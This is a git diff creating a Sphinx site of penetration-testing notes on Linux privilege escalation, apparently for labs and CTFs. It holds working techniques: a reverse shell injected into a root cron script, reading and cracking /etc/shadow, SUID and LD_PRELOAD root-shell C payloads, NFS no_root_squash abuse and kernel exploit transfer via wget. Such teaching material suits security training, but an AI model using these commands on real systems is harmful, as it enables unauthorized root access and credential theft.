diff --git a/.github/workflows/documentation.yml b/.github/workflows/documentation.yml
new file mode 100644
index 0000000..7749521
--- /dev/null
+++ b/.github/workflows/documentation.yml
@@ -0,0 +1,28 @@
+name: Publish Monkeys using Sphinx
+
+on:
+ push:
+ branches:
+ - 'main'
+
+jobs:
+ build-docs:
+ runs-on: ubuntu-latest
+ steps:
+ - name: Checkout
+ uses: actions/checkout@v2
+ - uses: actions/setup-python@v3
+ - name: Install dependencies
+ run: |
+ pip install sphinx==5.1.0 sphinx_rtd_theme myst-parser sphinx-markdown-tables
+ - name: Build documentation
+ run: |
+ make html
+ - name: Deploy
+ uses: peaceiris/actions-gh-pages@v3
+ if: ${{ github.event_name == 'push' && github.ref == 'refs/heads/main' }}
+ with:
+ publish_branch: gh-pages
+ github_token: ${{ secrets.GITHUB_TOKEN }}
+ publish_dir: build/html/
+ force_orphan: true
\ No newline at end of file
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..f5560af
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,33 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# Mac custom attributes file (Desktop Service Store)
+.DS_Store
+
+# PyCharm files
+.idea/
+
+# Instance Folder - used for run-time files
+instance/*.cfg
+instance/*.db
+instance/*.log
+instance/*.log*
+
+# Log Files
+instance/logs/
+*.log
+
+# Coverage output
+.coverage
+htmlcov/
+
+# Virtual Environment
+/venv/
+
+# pytest files
+.pytest_cache/
+
+# Not the static site, will be generated on push
+build/
\ No newline at end of file
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..d0c3cbf
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,20 @@
+# Minimal makefile for Sphinx documentation
+#
+
+# You can set these variables from the command line, and also
+# from the environment for the first two.
+SPHINXOPTS ?=
+SPHINXBUILD ?= sphinx-build
+SOURCEDIR = source
+BUILDDIR = build
+
+# Put it first so that "make" without argument is like "make help".
+help:
+ @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
+
+.PHONY: help Makefile
+
+# Catch-all target: route all unknown targets to Sphinx using the new
+# "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS).
+%: Makefile
+ @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O)
diff --git a/README.md b/README.md
index 7f843ac..9152236 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,32 @@
-# red-escalation
-Privilege escalation
+# Monkeys
+
+
+ Deployed: https://tymyrddin.github.io/red-escalation/
+
+Built with [Sphinx](https://www.sphinx-doc.org) using a [theme](https://github.com/readthedocs/sphinx_rtd_theme) provided
+by [Read the Docs](https://readthedocs.org/).
+
+## Requirements
+
+* sphinx — sphinx package
+* sphinx-rtd-theme — a theme package
+* myst-parser — parsing `.md` files
+* sphinx-markdown-tables — package for Markdown tables support
+
+## Usage
+
+Add or change documents in the source folder.
+
+Make the build:
+```bash
+$ make html
+```
+
+## Problems or Suggestions
+
+This project welcomes contributions and suggestions.
+
+[Open an issue here](https://github.com/tymyrddin/red-escalation/issues)
+
+## Mind
+Where you stand depends on where you sit, and all threats are cross-vector threats. Without a clear mandate for testing, measuring and reporting actual improvements in security, attempts at improving security makes absolutely no sense, not even for the low-hanging fruit.
diff --git a/make.bat b/make.bat
new file mode 100644
index 0000000..dc1312a
--- /dev/null
+++ b/make.bat
@@ -0,0 +1,35 @@
+@ECHO OFF
+
+pushd %~dp0
+
+REM Command file for Sphinx documentation
+
+if "%SPHINXBUILD%" == "" (
+ set SPHINXBUILD=sphinx-build
+)
+set SOURCEDIR=source
+set BUILDDIR=build
+
+%SPHINXBUILD% >NUL 2>NUL
+if errorlevel 9009 (
+ echo.
+ echo.The 'sphinx-build' command was not found. Make sure you have Sphinx
+ echo.installed, then set the SPHINXBUILD environment variable to point
+ echo.to the full path of the 'sphinx-build' executable. Alternatively you
+ echo.may add the Sphinx directory to PATH.
+ echo.
+ echo.If you don't have Sphinx installed, grab it from
+ echo.https://www.sphinx-doc.org/
+ exit /b 1
+)
+
+if "%1" == "" goto help
+
+%SPHINXBUILD% -M %1 %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
+goto end
+
+:help
+%SPHINXBUILD% -M help %SOURCEDIR% %BUILDDIR% %SPHINXOPTS% %O%
+
+:end
+popd
diff --git a/source/_static/css/custom.css b/source/_static/css/custom.css
new file mode 100644
index 0000000..f66ae82
--- /dev/null
+++ b/source/_static/css/custom.css
@@ -0,0 +1,36 @@
+h1 {
+ color: #DD0000;
+}
+
+a {
+ color: #DD0000;
+}
+
+a:hover {
+ color: #FF0000;
+}
+
+.wy-nav .wy-menu-vertical header {
+ color: #DD0000
+}
+
+.wy-menu-vertical header, .wy-menu-vertical p.caption {
+ color: #DD0000;
+}
+
+.wy-side-nav-search {
+ background-color: #333333;
+ color: #fcfcfc;
+}
+
+.wy-side-nav-search input[type="text"] {
+ width: 100%;
+ border-radius: 0px;
+ padding: 6px 12px;
+ border-color: #DD0000;
+}
+
+.highlight {
+ background: #333;
+ color: #ddd;
+}
\ No newline at end of file
diff --git a/source/_templates/footer.html b/source/_templates/footer.html
new file mode 100644
index 0000000..c440f74
--- /dev/null
+++ b/source/_templates/footer.html
@@ -0,0 +1,4 @@
+{% extends "!footer.html" %}
+{%- block contentinfo %}
+ Unseen University, 2022
+{% endblock %}
diff --git a/source/conf.py b/source/conf.py
new file mode 100644
index 0000000..34b5a86
--- /dev/null
+++ b/source/conf.py
@@ -0,0 +1,99 @@
+# Configuration file for the Sphinx documentation builder.
+#
+# For the full list of built-in configuration values, see the documentation:
+# https://www.sphinx-doc.org/en/master/usage/configuration.html
+
+# -- Project information -----------------------------------------------------
+# https://www.sphinx-doc.org/en/master/usage/configuration.html#project-information
+
+project = 'Monkeys know what tree to climb'
+copyright = '2022, Ty Myrddin'
+author = 'Ty Myrddin'
+release = '0.1'
+
+# -- General configuration ---------------------------------------------------
+
+# Add any Sphinx extension module names here, as strings. They can be
+# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
+# ones.
+extensions = [
+ 'myst_parser',
+ 'sphinx_markdown_tables',
+ 'sphinx.ext.intersphinx',
+]
+
+source_suffix = ['.rst', '.md']
+
+# Add any paths that contain templates here, relative to this directory.
+templates_path = ['_templates']
+
+# List of patterns, relative to source directory, that match files and
+# directories to ignore when looking for source files.
+# This pattern also affects html_static_path and html_extra_path.
+exclude_patterns = []
+
+
+# -- Options for HTML output -------------------------------------------------
+
+# The theme to use for HTML and HTML Help pages. See the documentation for
+# a list of builtin themes.
+#
+html_theme = 'sphinx_rtd_theme'
+
+html_theme_options = {
+ 'display_version': True,
+ 'prev_next_buttons_location': 'bottom',
+ 'style_external_links': True,
+ # Toc options
+ 'collapse_navigation': False,
+ 'sticky_navigation': False,
+ 'navigation_depth': 3,
+ 'includehidden': True,
+ 'titles_only': False
+}
+
+html_title = "Monkeys know what tree to climb"
+html_logo = "img/logo.png"
+html_favicon = "img/favicon.ico"
+
+
+# Add any paths that contain custom static files (such as style sheets) here,
+# relative to this directory. They are copied after the builtin static files,
+# so a file named "default.css" will overwrite the builtin "default.css".
+html_static_path = ['_static']
+
+# These paths are either relative to html_static_path
+# or fully qualified paths (eg. https://...)
+html_css_files = [
+ 'css/custom.css',
+]
+
+# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
+html_show_sphinx = False
+
+# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
+html_show_copyright = False
+
+
+# Intersphinx
+intersphinx_mapping = {
+ "attack-trees": ("https://tymyrddin.github.io/attack-trees/", None),
+ "cheatsheets": ("https://tymyrddin.github.io/cheatsheets/", None),
+ "e2ee-threat-model":("https://tymyrddin.github.io/e2ee-threat-model/", None),
+ "da-threat-model":("https://tymyrddin.github.io/da-threat-model/", None),
+ "se-threat-model":("https://tymyrddin.github.io/se-threat-model/", None),
+ "app-threat-model":("https://tymyrddin.github.io/app-threat-model/", None),
+ "cicd-threat-model":("https://tymyrddin.github.io/cicd-threat-model/", None),
+ "linux-pc-mitigations":("https://tymyrddin.github.io/linux-pc-mitigations/", None),
+ "linux-server-mitigations":("https://tymyrddin.github.io/linux-server-mitigations/", None),
+ "data-mitigations":("https://tymyrddin.github.io/data-mitigations/", None),
+ "webserver-mitigations":("https://tymyrddin.github.io/webserver-mitigations/", None),
+ "mailserver-mitigations":("https://tymyrddin.github.io/mailserver-mitigations/", None),
+ "network-mitigations":("https://tymyrddin.github.io/network-mitigations/", None),
+ "app-mitigations": ("https://tymyrddin.github.io/app-mitigations/", None),
+ "android-mitigations": ("https://tymyrddin.github.io/android-mitigations/", None),
+ "windows-pc-mitigations": ("https://tymyrddin.github.io/windows-pc-mitigations/", None),
+ "macos-mitigations": ("https://tymyrddin.github.io/macos-mitigations/", None),
+ "ios-mitigations": ("https://tymyrddin.github.io/ios-mitigations/", None),
+}
+myst_url_schemes = ["http", "https", ]
diff --git a/source/docs/linux/README.md b/source/docs/linux/README.md
new file mode 100644
index 0000000..6790818
--- /dev/null
+++ b/source/docs/linux/README.md
@@ -0,0 +1,29 @@
+# Introduction
+
+## What?
+
+There are many ways to escalate linux privileges. These are the most common methods based on common real-world
+misconfigurations and flaws.
+
+## Why?
+
+Gain access to additional users, hosts, and resources, be able to take action, like install software, to get user
+data that can possibly give access to even more sites or systems, destroy or alter audit trails to hide tracks of
+having been there, etc.
+
+## How?
+
+* [Kernel vulnerability exploits](kernel.md)
+* [Exploit sudo misconfigurations](sudo.md)
+* [SUID and SGID exploits](suid.md)
+* [Exploit capable programs](capabilities.md)
+* [Cron jobs exploits](cron.md)
+* [Path exploits](path.md)
+* [NFS exploits](nfs.md)
+* [Linux escalation resources](resources.md)
+
+
+
+
+
+
diff --git a/source/docs/linux/capabilities.md b/source/docs/linux/capabilities.md
new file mode 100644
index 0000000..97c310b
--- /dev/null
+++ b/source/docs/linux/capabilities.md
@@ -0,0 +1,35 @@
+# Exploit capable programs
+
+## Attack tree
+
+```text
+1 Become root on Linux via capabilities
+ 1.1 Check for capable programs
+ 1.2 Leverage program
+```
+
+## Example: vim
+
+To check for capable programs, use the `getcap` tool:
+```text
+karen@target:~$ getcap -r / 2>/dev/null
+/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
+/usr/bin/traceroute6.iputils = cap_net_raw+ep
+/usr/bin/mtr-packet = cap_net_raw+ep
+/usr/bin/ping = cap_net_raw+ep
+/home/karen/vim = cap_setuid+ep
+/home/ubuntu/view = cap_setuid+ep
+```
+
+[Leverage vim](https://gtfobins.github.io/gtfobins/vim/) and execute a shell using python:
+
+```text
+vim -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
+```
+
+## Notes
+
+Another method system administrators can use to increase the privilege level of a process or binary is by capabilities.
+Capabilities help manage privileges at a more granular level. If a SOC analyst needs to use a tool that needs to
+initiate socket connections, the capabilities of the binary can be changed such that it would get through its task
+without needing a higher privilege user.
diff --git a/source/docs/linux/cron.md b/source/docs/linux/cron.md
new file mode 100644
index 0000000..c518f1e
--- /dev/null
+++ b/source/docs/linux/cron.md
@@ -0,0 +1,102 @@
+# Cron jobs exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux using cron jobs
+ 1.1 Find cron jobs from current user that run as root and may be exploited
+ 1.2 Change the script or program to start a reverse shell as root
+ 1.3 Listen and wait for it
+```
+
+## Example: Backup script
+
+`ssh` into the target machine and look at `/etc/crontab`:
+
+```text
+Last login: Sun Jun 20 10:17:43 2021 from 10.9.2.27
+$ cat /etc/crontab
+...
+#
+* * * * * root /antivirus.sh
+* * * * * root antivirus.sh
+* * * * * root /home/karen/backup.sh
+* * * * * root /tmp/test.py
+```
+
+Karen's backup script and test.py both run as root. Use either.
+
+On the attack machine start a listener:
+
+```text
+└─$ nc -lnvp 4444
+Ncat: Version 7.92 ( https://nmap.org/ncat )
+Ncat: Listening on :::4444
+Ncat: Listening on 0.0.0.0:4444
+```
+
+Change the backup script:
+
+```text
+$ ls
+backup.sh
+$ mv backup.sh backup.sh.old
+$ touch backup.sh
+$ nano backup.sh
+```
+
+Put this code in:
+
+```text
+#!/bin/bash
+
+bash -i >& /dev/tcp//4444 0>&1
+```
+
+And make the script executable:
+
+```text
+$ chmod +x backup.sh
+```
+
+On the attack machine:
+
+```text
+└─# nc -lnvp 4444
+Ncat: Version 7.92 ( https://nmap.org/ncat )
+Ncat: Listening on :::4444
+Ncat: Listening on 0.0.0.0:4444
+Ncat: Connection from .
+Ncat: Connection from :55932.
+bash: cannot set terminal process group (12785): Inappropriate ioctl for device
+bash: no job control in this shell
+root@target:~# python3 -c 'import pty; pty.spawn("/bin/bash")'
+python3 -c 'import pty; pty.spawn("/bin/bash")'
+root@target:~# cat /etc/shadow | grep matt
+cat /etc/shadow | grep matt
+matt:$6$WHmIjebL7MA7KN9A$C4UBJB4WVI37r.Ct3Hbhd3YOcua3AUowO2w2RUNauW8IigHAyVlHzhLrIUxVSGa.twjHc71MoBJfjCTxrkiLR.:18798:0:99999:7:::
+root@target:~# cat /etc/passwd | grep matt
+cat /etc/passwd | grep matt
+matt:x:1002:1002::/home/matt:/bin/sh
+```
+
+On the attack machine, copy matt's shadow in `shadow.txt` and matt's password in `password.txt`. Crack.
+
+```text
+$ unshadow passwd.txt shadow.txt > crackmatt.txt
+
+$ john --wordlist=/usr/share/wordlists/rockyou.txt crackmatt.txt
+Using default input encoding: UTF-8
+Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 512/512 AVX512BW 8x])
+Cost 1 (iteration count) is 5000 for all loaded hashes
+Will run 4 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+123456 (matt)
+1g 0:00:00:00 DONE (2022-09-25 23:30) 3.225g/s 3303p/s 3303c/s 3303C/s 123456..bethany
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed.
+```
+
+## Notes
+
+Not really exploit usage, but based on files with incorrectly installed authorities.
\ No newline at end of file
diff --git a/source/docs/linux/kernel.md b/source/docs/linux/kernel.md
new file mode 100644
index 0000000..b0a2b42
--- /dev/null
+++ b/source/docs/linux/kernel.md
@@ -0,0 +1,67 @@
+# Kernel vulnerability exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux via kernel exploit
+ 1.1 Identify the kernel version (AND)
+ 1.2 Detect vulnerabilities (AND)
+ 1.3 Develop or acquire exploit code (AND)
+ 1.4 Transfer the exploit to the target machine (AND)
+ 1.5 Execute the exploit on the target
+```
+
+## Example: CVE-2015-1328
+
+For [CVE-2015-1328](https://ubuntu.com/security/CVE-2015-1328) exploit-db lists several possible exploits:
+
+* [37292](https://www.exploit-db.com/exploits/37292)
+* [37293](https://www.exploit-db.com/exploits/37293)
+* [40688](https://www.exploit-db.com/exploits/40688) <= Metasploit, maybe there are other exploits too
+
+### Using 37292
+
+1. Create a local file `37292.c` in the `/tmp/` directory and paste the code in the file
+2. Start a local python http server: `python -m http.server 8080`
+3. From the target machine: `wget http://:8888/37292.c`
+4. Compile on target machine: `gcc CVE-2015-1328.c -o 37292`
+5. Make executable: `chmod +x 37292`
+6. Check current user: `id`
+7. Run the compiled exploit: `./exp`
+8. Check current user: `id`
+
+### Using 40688
+
+1. Upgrade existing shell (meterpreter, ssh, or a basic command shell) to `meterpreter` session
+
+Open a new meterpreter session with:
+
+```text
+sessions -u
+```
+
+Or upgrade the most recently opened session to meterpreter:
+
+```text
+sessions -u -1
+```
+
+2. Load the `local_exploit_suggester` module in `msfconsole`:
+
+```text
+meterpreter> use post/multi/recon/local_exploit_suggester
+```
+
+3. Set the SESSION option for the module to the session ID of the meterpreter session, and `run`
+4. Test the exploit modules recommended by `local_exploit_suggester`. The first few modules in the output usually
+have a higher chance of working successfully.
+5. Load a module, set the module options and `exploit`
+6. An exploit can fail for many reasons. If not works, try the next one or install missing components for it to run.
+
+## Notes
+
+A failed kernel exploit can lead to a system crash. Make sure this potential outcome is acceptable within the scope of
+the penetration testing engagement before attempting a kernel exploit.
+
+You can transfer the exploit code from your machine to the target system using the SimpleHTTPServer Python module and
+wget respectively.
diff --git a/source/docs/linux/nfs.md b/source/docs/linux/nfs.md
new file mode 100644
index 0000000..2e019bd
--- /dev/null
+++ b/source/docs/linux/nfs.md
@@ -0,0 +1,104 @@
+# NFS exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux via NFS exploits
+ 1.1 Look for no_root_squash shares
+ 1.2 Mount share
+ 1.3 Create a payload
+ 1.3.1 Bash binary with an SUID bit
+ 1.3.2 C binary with an SUID bit
+ 1.4 Execute the payload on the target machine to escalate privileges
+ 1.5 Unmount the shared directory in the attacker machine
+```
+
+## Example: /tmp share
+
+1. Get information:
+
+```text
+$ ps aux | grep nfsd
+$ cat /etc/exports
+```
+There is a `/tmp` share with `no_root_squash` set.
+
+2. Shares with the `no_root_squash` option can possibly be modified and executed as root.
+3. On the attacker machine install the NFS client package: `sudo apt install nfs-common`
+4. On the attacker machine, create a directory to host the NFS share: `mkdir /tmp/nfs`
+5. With `sudo`, mount the remote share in the `/tmp/nfs` directory
+
+```text
+sudo mount -o rw,vers=2 :/tmp /tmp/nfs
+```
+
+Or:
+
+```text
+sudo mount -t nfs :/tmp /tmp/nfs
+```
+6. Payload
+
+Bash binary with an SUID bit:
+
+```text
+sudo cp /bin/bash /tmp/nfs/bash && sudo chmod u+s /tmp/nfs/bash
+```
+
+C binary with an SUID bit - you may need to change the `/usr/bin/bash` to `/bin/bash`, depending on location of `bash`
+in the target machine:
+
+```text
+#include
+#include
+#include
+
+int main() {
+ setresuid(0, 0, 0);
+ setuid(getuid());
+ system("/usr/bin/bash");
+ return 0;
+}
+```
+
+Compile:
+
+```text
+gcc payload.c -o payload && sudo rm /tmp/nfs/payload 2>/dev/null; sudo cp payload /tmp/nfs
+```
+
+Set de SUID bit:
+
+```text
+sudo chmod u+s /tmp/nfs/payload
+```
+
+7. In the target machine, execute the payload to escalate privileges:
+
+```text
+:/tmp$ ./bash -p
+# whoami
+root
+# exit
+```
+
+```text
+:/tmp$ ./payload
+:/tmp# id
+uid=0(root) gid=1000(low) ...
+```
+
+8. Unmount the shared directory in the attacker machine:
+
+```text
+sudo umount /tmp/nfs
+```
+
+## Notes
+
+The NFS configuration file is `/etc/exports`:
+
+* `no_root_squash`: This option basically gives authority to the root user on the client (us, our attacker host)
+to access files on the NFS server as root. This is bad, as we can create malicious files on the NFS share as the
+root user.
+* `no_all_squash`: This is similar to no_root_squash option but applies to non-root users.
diff --git a/source/docs/linux/path.md b/source/docs/linux/path.md
new file mode 100644
index 0000000..1ac6857
--- /dev/null
+++ b/source/docs/linux/path.md
@@ -0,0 +1,30 @@
+# Path exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux
+ 1.1 Search for files with incorrectly installed authorities that are on PATH (OR)
+ 1.2 Change PATH
+ 1.3 Use script or program
+```
+
+## Example
+
+1. What folders are located under `$PATH`?
+
+````text
+$ echo $PATH
+````
+2. Does current user have `write` privileges for any of these folders?
+
+```text
+find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort
+```
+
+3. Can `$PATH` be modified?
+4. Is there a script/application that will be affected by this vulnerability?
+
+## Notes
+
+Not really exploit usage, but based on files with incorrectly installed authorities.
\ No newline at end of file
diff --git a/source/docs/linux/resources.md b/source/docs/linux/resources.md
new file mode 100644
index 0000000..a9a2821
--- /dev/null
+++ b/source/docs/linux/resources.md
@@ -0,0 +1,14 @@
+# Linux escalation resources
+
+## Tools
+
+* [LinEnum](https://github.com/rebootuser/LinEnum)
+* [PEASS-ng](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) is a script that searches for possible paths to escalate privileges on Linux/Unix* hosts. It also enumerates the system.
+* [Linux Exploit Suggester 2](https://github.com/jondonas/linux-exploit-suggester-2) returns a list of possible CVEs, exploits, and exploit POCs (Proof of Concept) for the running Linux kernel.
+* [GTFOBins](https://gtfobins.github.io/) is a curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems.
+* [Traitor](https://github.com/liamg/traitor) takes advantage of local misconfigurations and vulnerabilities (including most of GTFOBins) in order to pop a root shell. These are primarily misconfigurations, not exploits.
+
+## Cheatsheets
+
+* [Linux post exploitation enumeration](cheatsheets:docs/enumeration/linux-post)
+* [GTFObins](https://gtfobins.github.io/)
\ No newline at end of file
diff --git a/source/docs/linux/sudo.md b/source/docs/linux/sudo.md
new file mode 100644
index 0000000..d1de8fe
--- /dev/null
+++ b/source/docs/linux/sudo.md
@@ -0,0 +1,87 @@
+# Exploit sudo misconfigurations
+
+## Attack tree
+
+```text
+1 Become root on Linux via sudo exploit
+ 1.1 Find which commands current user is allowed to use (sudo -l) (AND)
+ 1.2 Exploit the parameters of a command that is allowed to be executed with root permissions
+ 1.2.1 sudo find /etc/passwd -exec /bin/sh \; (OR)
+ 1.2.2 sudo vim -c '!sh' (OR)
+ 1.2.3 sudo awk 'BEGIN {system(“/bin/sh”)}' (OR)
+ 1.2.4 Other commands that are allowed to be executed with root permissions to invoke a shell
+```
+
+## Example: find
+
+### LD_PRELOAD
+
+`LD_PRELOAD` allows program to
+[use/load shared libraries](https://rafalcieslak.wordpress.com/2013/04/02/dynamic-linker-tricks-using-ld_preload-to-cheat-inject-features-and-investigate-programs/).
+If the `env_keep` option is enabled we can generate a
+shared library which will be loaded and executed before the program is run. The `LD_PRELOAD` option will be ignored
+if the real user ID is different from the effective user ID.
+
+1. Check for `env_keep+=LD_PRELOAD` (using `sudo -l`)
+2. Write a simple C code compiled as a share object (`.so` extension) file
+
+```text
+#include
+#include
+#include
+
+void _init() {
+unsetenv("LD_PRELOAD");
+setgid(0);
+setuid(0);
+system("/bin/bash");
+}
+```
+
+Save as shell.c and compile:
+
+ gcc -fPIC -shared -o shell.so shell.c -nostartfiles
+
+Use this shared object file when launching any program the user can run with sudo.
+
+3. Run the program with sudo rights and the `LD_PRELOAD` option pointing to the `.so` file
+
+```text
+sudo LD_PRELOAD=/home/user/ldpreload/shell.so find
+```
+
+This will result in a shell spawn with root privileges.
+
+### Another find
+
+Another [find in GTFObins](https://gtfobins.github.io/gtfobins/find/) for escalating privileges with `find`:
+
+```text
+Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)
+...
+$ sudo -l
+Matching Defaults entries for karen on ip-10-10-0-32:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+User karen may run the following commands on ip-10-10-0-32:
+ (ALL) NOPASSWD: /usr/bin/find
+ (ALL) NOPASSWD: /usr/bin/less
+ (ALL) NOPASSWD: /usr/bin/nano
+$ id
+uid=1001(karen) gid=1001(karen) groups=1001(karen)
+$ sudo find . -exec /bin/sh \; -quit
+# id
+uid=0(root) gid=0(root) groups=0(root)
+```
+
+## Notes
+
+The `sudo` command, by default, allows for running a program with root privileges. System administrators sometimes
+give regular users some flexibility on their privileges. For example, a junior SOC analyst may need to use Nmap
+but would not be cleared for full root access. The system administrator can allow this user to only run Nmap with
+root privileges while keeping its regular privilege level throughout the rest of the system.
+
+Any user can check its current situation related to root privileges using the `sudo -l` command.
+
+Use [GTFObins](https://gtfobins.github.io/) for gathering information on how any program, on which a user may have sudo rights, can be used.
diff --git a/source/docs/linux/suid.md b/source/docs/linux/suid.md
new file mode 100644
index 0000000..28ee2d9
--- /dev/null
+++ b/source/docs/linux/suid.md
@@ -0,0 +1,50 @@
+# SUID and SGID exploits
+
+## Attack tree
+
+```text
+1 Become root on Linux via SUID
+ 1.1 List files that have SUID or SGID bits set (AND)
+ 1.3 Exploit
+```
+
+## Example: nano
+
+### Crack passwords file
+
+1. List files that have `SUID` or `SGID` bits set:
+
+```text
+find / -type f -perm -04000 -ls 2>/dev/null
+```
+
+2. Compare these executables with [GTFOBins SUID](https://gtfobins.github.io/#+suid). The nano text editor has the
+SUID bit set
+3. Read `/etc/passwd` and `/etc/shadow` using nano.
+4. Copy contant to local `passwd.txt` resp `shadow.txt` files.
+5. Use the `unshadow` tool to create a file crackable by John the Ripper
+
+```text
+unshadow passwd.txt shadow.txt > passwords.txt
+```
+
+### Add a user
+
+The other option would be to add a new user that has root privileges.
+
+1. Using the `openssl` tool, create a password hash for a new user:
+
+```text
+openssl passwd -1 -salt
+```
+
+2. Add this password with a username to the `/etc/passwd` file. Use `root:/bin/bash` to give this user a root shell.
+3. Switch to this user.
+
+## Notes
+
+SUID (Set-user Identification) and SGID (Set-group Identification) allow files to be executed with the
+permission level of the file owner or the group owner, respectively.
+
+Such files have an `s` bit set showing their special permission level. To find binaries known to be exploitable
+when the SUID bit is set see [GTFObins SUID](https://gtfobins.github.io/#+suid).
diff --git a/source/docs/thm/README.md b/source/docs/thm/README.md
new file mode 100644
index 0000000..dd49eb4
--- /dev/null
+++ b/source/docs/thm/README.md
@@ -0,0 +1,14 @@
+# Introduction
+
+## What?
+
+Not an exhaustive list of all escalation methods, but does include some "edge-case" tactics that may be seen in a
+Capture the Flag (CTF) exercise.
+
+## Why?
+
+To build experience with which tree climbing and monkeying about.
+
+## How?
+
+* [Steel Mountain](steel-mountain.md)
\ No newline at end of file
diff --git a/source/docs/thm/steel-mountain.md b/source/docs/thm/steel-mountain.md
new file mode 100644
index 0000000..0cd964a
--- /dev/null
+++ b/source/docs/thm/steel-mountain.md
@@ -0,0 +1 @@
+# Steel Mountain
\ No newline at end of file
diff --git a/source/docs/windows/README.md b/source/docs/windows/README.md
new file mode 100644
index 0000000..3314eb1
--- /dev/null
+++ b/source/docs/windows/README.md
@@ -0,0 +1,17 @@
+# Introduction
+
+## What?
+
+Windows presents an enormous attack surface and most companies run Windows hosts, so we will often find ourselves
+gaining access to Windows machines. These are all methods on common real-world misconfigurations and flaws
+in modern and legacy Windows Server and Desktop versions that may be present in a client environment.
+
+## Why?
+
+After gaining a foothold, enumeration is the key to privilege escalation. Elevating privileges will provide more
+options for persistence and may reveal information stored locally that can further our access in the environment.
+
+## How?
+
+
+
diff --git a/source/img/favicon.ico b/source/img/favicon.ico
new file mode 100644
index 0000000..cda29d6
Binary files /dev/null and b/source/img/favicon.ico differ
diff --git a/source/img/logo.png b/source/img/logo.png
new file mode 100644
index 0000000..087760c
Binary files /dev/null and b/source/img/logo.png differ
diff --git a/source/index.rst b/source/index.rst
new file mode 100644
index 0000000..2553550
--- /dev/null
+++ b/source/index.rst
@@ -0,0 +1,32 @@
+Monkeys know what tree to climb
+===========================================================
+
+.. toctree::
+ :maxdepth: 1
+ :includehidden:
+ :caption: Linux escalation
+
+ docs/linux/README.md
+ docs/linux/kernel.md
+ docs/linux/sudo.md
+ docs/linux/suid.md
+ docs/linux/capabilities.md
+ docs/linux/cron.md
+ docs/linux/path.md
+ docs/linux/nfs.md
+ docs/linux/resources.md
+
+.. toctree::
+ :maxdepth: 1
+ :includehidden:
+ :caption: Windows escalation
+
+ docs/windows/README.md
+
+.. toctree::
+ :maxdepth: 1
+ :includehidden:
+ :caption: THM Scenarios
+
+ docs/thm/README.md
+ docs/thm/steel-mountain.md
\ No newline at end of file